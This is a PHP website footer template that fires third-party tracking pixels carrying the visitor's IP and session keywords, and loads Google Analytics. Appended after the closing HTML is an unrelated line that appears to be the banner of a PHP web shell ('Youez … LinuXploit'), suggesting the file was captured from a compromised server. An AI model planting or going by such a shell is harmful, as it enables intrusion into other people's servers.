<img src="https://www.surfcrm.com/lcapi/KeywordImpressionTracking.php?site=fa&ip_address=<?= $_SERVER['REMOTE_ADDR'];?>&keywords=<?= urlencode($_SESSION['keywords']);?>&landing_page=<?= urlencode($_SESSION['landing_page']);?>&referer_domain=<?= urlencode($_SESSION['referer_domain']);?>" />
<?	if (isset($_SERVER['HTTPS']))
	{
?>
	<img src="https://www.surfcrm.com/tracker/server/tracker.php?<?= $trackerparams; ?>">
<? 	
	}
	else
	{
?>
	<img src="http://www.surfcrm.com/tracker/server/tracker.php?<?= $trackerparams; ?>">
<?
	}
?>

<!-- Google Analytics Code for every page -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<?php
$current_page = '';
$stack = get_included_files();
foreach($stack as $s) {
	if(!in_array(basename($s),array('order.php','header.php','keyword_parser.php','ads.php','sidebar.php','header2.php','footer2.php','php_header.php','globals.php','functions.includes.php','LCAPI.php','TrackerLib.php','Yahoo.php','MIVA.php','Unknown.php','footer.php'))) {
		$current_page = basename($s);
	}
}
?>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-11018739-1");
pageTracker._trackPageview('<?= $current_page;?>');
} catch(err) {}</script>
<!-- END Google Analytics Code for every page -->

</body>
</html>



Youez - 2016 - github.com/yon3zu
LinuXploit